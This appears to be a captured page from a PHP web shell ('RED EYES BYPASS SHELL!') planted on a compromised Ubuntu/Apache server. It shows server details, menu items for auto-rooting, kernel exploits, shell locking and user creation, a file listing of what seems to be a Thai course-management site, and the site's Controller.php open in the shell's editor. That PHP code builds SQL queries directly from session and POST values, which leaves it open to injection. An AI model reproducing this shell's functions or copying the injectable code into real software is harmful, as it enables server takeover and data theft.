Linux sothorn202 5.15.0-161-generic #171-Ubuntu SMP Sat Oct 11 08:17:01 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 202.28.82.202 | : 216.73.216.9
pkexec version 0.105
Cant Read [ /etc/named.conf ]
iqtd
RED EYES BYPASS SHELL!
Terminal
Auto Root
Adminer
Backdoor Destroyer
Kernel Exploit
Lock Shell
Lock File
Create User
+ Create Folder
+ Create File
/
home /
lifelonglearn /
work_181165 /
API /
ViewsCouse /
[ HOME SHELL ]
NAME
SIZE
PERMISSION
ACTION
Controller.php
8.92
KB
-rwxr-xr-x
SaveCouseManage.php
2.58
KB
-rwxr-xr-x
StudyCouse.php
5.21
KB
-rwxr-xr-x
couseFetch.php
3.6
KB
-rwxr-xr-x
couseSelect.php
3.52
KB
-rwxr-xr-x
saveControl.php
8.23
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Controller.php
<?php try { require_once("../../server/server.php"); if ($_SERVER["REQUEST_METHOD"] == "POST") { $Unitdata = json_decode($_POST["Unitdata"], true); $db->query("TRUNCATE TABLE couse"); $db->query("TRUNCATE TABLE dataUnit"); $db->query("TRUNCATE TABLE Unitdata"); $Unitdetail = $_POST["Unitdetail"]; $Unitname = $_POST["Unitname"]; $status = $_POST["status"]; $AuthToken = $_POST["AuthToken"]; if ($status == false) { $status = 405; }else { $status = 200; } $id = $_SESSION["lms-ID"]; $stmp = $db->prepare("SELECT ID, AuthToken from user where ID = '$id'"); if ($stmp->execute()) { $data = $stmp->fetch(PDO::FETCH_ASSOC); if (password_verify($AuthToken, $data["AuthToken"])) { $file1 = false; $file2 = false; $allow = array("png", "jpg", "webp","jpeg"); if (isset($_FILES["file"])) { $file = $_FILES["file"]; $ext = pathinfo($file["name"], PATHINFO_EXTENSION); $newFiletitle = rand(0, microtime(true)) . "." . $ext; define('KB', 1024); define('MB', 1048576); define('GB', 1073741824); define('TB', 1099511627776); if ( $file["size"] > 15 * MB) { http_response_code(405); echo json_encode(array("status" => false, "message" => "ขนาดไฟล์สูงสุด 15 mb")); exit; } else if (!in_array($ext, $allow)) { http_response_code(405); echo json_encode(array("status" => false, "message" => "ไม่รองรับไฟล์นี้!!")); exit; } else { $file1 = true; } } if (isset($_FILES["file-detail"])) { $file = $_FILES["file-detail"]; $ext = pathinfo($file["name"], PATHINFO_EXTENSION); $newFile = rand(0, microtime(true)) . "." . $ext; define('KB', 1024); define('MB', 1048576); define('GB', 1073741824); define('TB', 1099511627776); if ( $file["size"] > 15 * MB) { http_response_code(405); echo json_encode(array("status" => false, "message" => "ขนาดไฟล์สูงสุด 15 mb")); exit; } else if (!in_array($ext, $allow)) { http_response_code(405); echo json_encode(array("status" => false, "message" => "ไม่รองรับไฟล์นี้!!")); exit; } else { $file2 = "file"; } } else if (isset($_POST["file-detail"])) { $file2 = "video"; } else { $file2 = false; } if (isset($_FILES["file"])) { if (move_uploaded_file($_FILES["file"]["tmp_name"], "../../file/users/couse/" . $newFiletitle)) { $newFiletitle = "file/users/couse/" . $newFiletitle; } else { http_response_code(405); echo json_encode(array("status" => false, "message" => "Failed to upload File!!")); exit; } } else { $newFiletitle = ""; } if ($file2 == "file") { if (move_uploaded_file($_FILES["file-detail"]["tmp_name"], "../../file/users/couse/" . $newFile)) { $newFile = "file/users/couse/" . $newFile; } else { if ($newFiletitle !== "") { unlink($newFiletitle); } http_response_code(405); echo json_encode(array("status" => false, "message" => "Failed to upload File!!")); exit; } } else if ($file2 = "video"){ $newFile = $_POST["file-detail"]; } $date = date("Y-m-d H:i"); $stmp = $db->prepare("INSERT INTO couse (UserID,Unitname,detail,filetitle,detailType,value,date,rate,see,comment,study,status) value ('$id','$Unitname','$Unitdetail',' $newFiletitle','$file2','$newFile','$date','0','0','0','0','$status')"); if ($stmp->execute()) { $last = $db->lastInsertId(); $err= array(); for ($i = 0; $i < count($Unitdata); $i++) { $BigUnitname = $Unitdata[$i]["BigUnitname"]; $dataUnit = $Unitdata[$i]["dataUnit"]; $query = $db->prepare("INSERT INTO Unitdata (name,tag) value('$BigUnitname','$last')"); if ($query->execute()) { $lastID = $db->lastInsertId(); for ($t = 0; $t < count($dataUnit); $t++) { $video = $dataUnit[$t]["video"]; $nameUnit = $dataUnit[$t]["Unitname"]; $see = $dataUnit[$t]["see"]; $end = $dataUnit[$t]["end"]; $skip = $dataUnit[$t]["skip"]; if ($see == "") { $see = "405"; }else { $see = "200"; } if ($end == "") { $end = "405"; }else { $end = "200"; } if ($skip == "") { $skip = "405"; }else { $skip = "200"; } $query = $db->prepare("INSERT INTO dataUnit (couseID,video,name,see,end,skip) value ('$lastID','$video','$nameUnit','$see','$end','$skip')"); if ($query->execute()) { }else { array_push($err, array("message" => '<i class="fa-solid fa-triangle-exclamation"></i> ไม่สามารถเพิ่มเนื้อหาย่อย '.$nameUnit.' ของ '.$BigUnitname.' ได้')); } } if (count($err) !== 0 ) { $_SESSION["lms-ErrReport"] = $err; $_SESSION["lms-ErrUrl"] = "couse?role=edit&ID=".$last; http_response_code(200); echo json_encode(array("status" => false, "message" => " success")); exit; }else { http_response_code(200); echo json_encode(array("status" => true, "message" => " success")); exit; } }else { unlink($newFiletitle); unlink($newFile); array_push($err, array("message" => '<i class="fa-solid fa-triangle-exclamation"></i> ไม่สามารถเพิ่มเนื้อหา '.$BigUnitname.' ได้')); } } } else { unlink($newFiletitle); unlink($newFile); http_response_code(405); echo json_encode(array("status" => false, "message" => " server Error!!")); exit; } } else { http_response_code(405); echo json_encode(array("status" => false, "message" => " AuthToken Invalid!!")); exit; } } else { http_response_code(405); echo json_encode(array("status" => false, "message" => " server Error!!")); exit; } } else { http_response_code(405); echo json_encode(array("status" => false, "message" => "Request method Not accept!!")); exit; } } catch (Exception $e) { http_response_code(405); echo json_encode(array("status" => false, "message" => $e->getMessage())); exit; }
Close